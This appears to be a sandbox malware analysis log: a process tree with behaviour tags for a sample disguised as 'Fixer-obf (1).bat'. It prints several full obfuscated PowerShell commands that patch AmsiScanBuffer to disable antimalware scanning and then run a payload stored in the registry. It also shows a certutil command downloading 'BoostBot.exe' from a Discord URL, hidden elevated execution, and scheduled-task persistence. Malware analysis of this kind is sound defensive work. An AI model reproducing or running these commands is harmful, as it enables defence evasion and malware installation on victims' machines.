C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OfjEyyqFKXGb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DtpvIrVmBALSHK,[Parameter(Position=1)][Type]$PRDRGWqkKb)$rvzetgfPfoL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+'e'+[Char](109)+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'gat'+'e'+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+'s'+'s'+','+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+'n'+'si'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'Au'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$rvzetgfPfoL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+'e,H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DtpvIrVmBALSHK).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+'e'+','+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rvzetgfPfoL.DefineMethod(''+'I'+'n'+'v'+'ok'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+[Char](100)+''+[Char](101)+'B'+[Char](121)+'Si'+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+','+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$PRDRGWqkKb,$DtpvIrVmBALSHK).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $rvzetgfPfoL.CreateType();}$ilOFuNWHFSTBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'st'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32'+[Char](46)+'Uns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$AwlIYqVyFlopCs=$ilOFuNWHFSTBJ.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+'t'+'at'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JezuMJUuosuacWcryxm=OfjEyyqFKXGb @([String])([IntPtr]);$dfcDAsXdcZghHURbnTCjZG=OfjEyyqFKXGb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OTMUWoghqnD=$ilOFuNWHFSTBJ.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+'2'+'.d'+[Char](108)+''+[Char](108)+'')));$GkLirFMyDGaWIF=$AwlIYqVyFlopCs.Invoke($Null,@([Object]$OTMUWoghqnD,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+'a'+[Char](114)+''+[Char](121)+'A')));$tnFVdSGNahlssJtlr=$AwlIYqVyFlopCs.Invoke($Null,@([Object]$OTMUWoghqnD,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$GcdKdYj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GkLirFMyDGaWIF,$JezuMJUuosuacWcryxm).Invoke(''+'a'+''+'m'+''+[Char](115)+'i.d'+[Char](108)+''+'l'+'');$bKTqMCsepMNpcISCk=$AwlIYqVyFlopCs.Invoke($Null,@([Object]$GcdKdYj,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$VmJPBoByMh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tnFVdSGNahlssJtlr,$dfcDAsXdcZghHURbnTCjZG).Invoke($bKTqMCsepMNpcISCk,[uint32]8,4,[ref]$VmJPBoByMh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bKTqMCsepMNpcISCk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tnFVdSGNahlssJtlr,$dfcDAsXdcZghHURbnTCjZG).Invoke($bKTqMCsepMNpcISCk,[uint32]8,0x20,[ref]$VmJPBoByMh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+'E').GetValue(''+'$'+''+'7'+'7'+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UBCJyowzGMTB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uuHLIjLgAKaoXB,[Parameter(Position=1)][Type]$oqattUSjHo)$KHrxeJjrYSL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+'ul'+'e'+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+'S'+'e'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'i'+'C'+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$KHrxeJjrYSL.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+'ide'+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uuHLIjLgAKaoXB).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$KHrxeJjrYSL.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+','+[Char](78)+''+'e'+''+[Char](119)+'Slo'+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$oqattUSjHo,$uuHLIjLgAKaoXB).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $KHrxeJjrYSL.CreateType();}$nvZgUoSETFjSq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+'ro'+'s'+''+'o'+'ft'+'.'+''+[Char](87)+''+'i'+''+'n'+''+[Char](51)+'2.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+'i'+[Char](118)+'e'+[Char](77)+''+'e'+'t'+[Char](104)+'o'+'d'+''+'s'+'');$zhmsvrBayRXIFe=$nvZgUoSETFjSq.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jNyXOMRzjCvXJCcpMLr=UBCJyowzGMTB @([String])([IntPtr]);$dwCMSbqQDqTUsEFFHDCNPZ=UBCJyowzGMTB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gEaTTVhPRxo=$nvZgUoSETFjSq.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+'e'+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+'e'+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$DumfyjAcAkhGDz=$zhmsvrBayRXIFe.Invoke($Null,@([Object]$gEaTTVhPRxo,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$gmqqFDNpifjXdcyHm=$zhmsvrBayRXIFe.Invoke($Null,@([Object]$gEaTTVhPRxo,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'lPr'+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$NNYZSMq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DumfyjAcAkhGDz,$jNyXOMRzjCvXJCcpMLr).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$egdKOQCgqvYDLYMdN=$zhmsvrBayRXIFe.Invoke($Null,@([Object]$NNYZSMq,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+'B'+'u'+''+'f'+''+'f'+'e'+'r'+'')));$vPtOJzeAGj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmqqFDNpifjXdcyHm,$dwCMSbqQDqTUsEFFHDCNPZ).Invoke($egdKOQCgqvYDLYMdN,[uint32]8,4,[ref]$vPtOJzeAGj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$egdKOQCgqvYDLYMdN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmqqFDNpifjXdcyHm,$dwCMSbqQDqTUsEFFHDCNPZ).Invoke($egdKOQCgqvYDLYMdN,[uint32]8,0x20,[ref]$vPtOJzeAGj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+'$'+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HHSMJrgrBUsB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$etKhyLdmiIlcek,[Parameter(Position=1)][Type]$ILfRXPxWyh)$eKZuWwDwJuQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+'ga'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'a'+'s'+'s'+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$eKZuWwDwJuQ.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$etKhyLdmiIlcek).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+'e,'+'M'+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$eKZuWwDwJuQ.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'l'+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$ILfRXPxWyh,$etKhyLdmiIlcek).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $eKZuWwDwJuQ.CreateType();}$gMETTuZOZQGyp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+'in'+[Char](51)+'2'+[Char](46)+''+'U'+'ns'+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+'tiv'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+'s');$VmZZLgIhqeAwBn=$gMETTuZOZQGyp.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Pro'+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JyfhsfCDqaooAKqnQdl=HHSMJrgrBUsB @([String])([IntPtr]);$BPuTDQsokZeWlUxpfIpUsm=HHSMJrgrBUsB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AiWBJeWsppo=$gMETTuZOZQGyp.GetMethod(''+'G'+'et'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+'el'+'3'+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$COXhUirOPYzieK=$VmZZLgIhqeAwBn.Invoke($Null,@([Object]$AiWBJeWsppo,[Object](''+[Char](76)+''+'o'+'ad'+[Char](76)+'ib'+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$svectFKYxNNHbhBaP=$VmZZLgIhqeAwBn.Invoke($Null,@([Object]$AiWBJeWsppo,[Object](''+'V'+'i'+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+'e'+'ct')));$cPsItzT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COXhUirOPYzieK,$JyfhsfCDqaooAKqnQdl).Invoke(''+[Char](97)+''+'m'+'si'+[Char](46)+''+[Char](100)+'l'+'l'+'');$MqPoTjWXrieqnBIPr=$VmZZLgIhqeAwBn.Invoke($Null,@([Object]$cPsItzT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$lMQQIWNueJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($svectFKYxNNHbhBaP,$BPuTDQsokZeWlUxpfIpUsm).Invoke($MqPoTjWXrieqnBIPr,[uint32]8,4,[ref]$lMQQIWNueJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MqPoTjWXrieqnBIPr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($svectFKYxNNHbhBaP,$BPuTDQsokZeWlUxpfIpUsm).Invoke($MqPoTjWXrieqnBIPr,[uint32]8,0x20,[ref]$lMQQIWNueJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵PID:2368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1284
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2888
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1304
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1588
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1900
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1960
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2508
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:668
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3344
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"2⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\system32\chcp.comchcp.com 4373⤵PID:1784
-
C:\Windows\system32\findstr.exefindstr /L /I set "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"3⤵PID:1516
-
C:\Windows\system32\findstr.exefindstr /L /I goto "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"3⤵PID:3184
-
C:\Windows\system32\findstr.exefindstr /L /I echo "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"3⤵PID:4528
-
C:\Windows\system32\findstr.exefindstr /L /I pause "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"3⤵PID:1084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:4788
-
C:\Windows\system32\find.exefind3⤵PID:3544
-
C:\Windows\system32\find.exefind3⤵PID:2264
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:3528
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe3⤵PID:4508
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:2324 -
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:3096 -
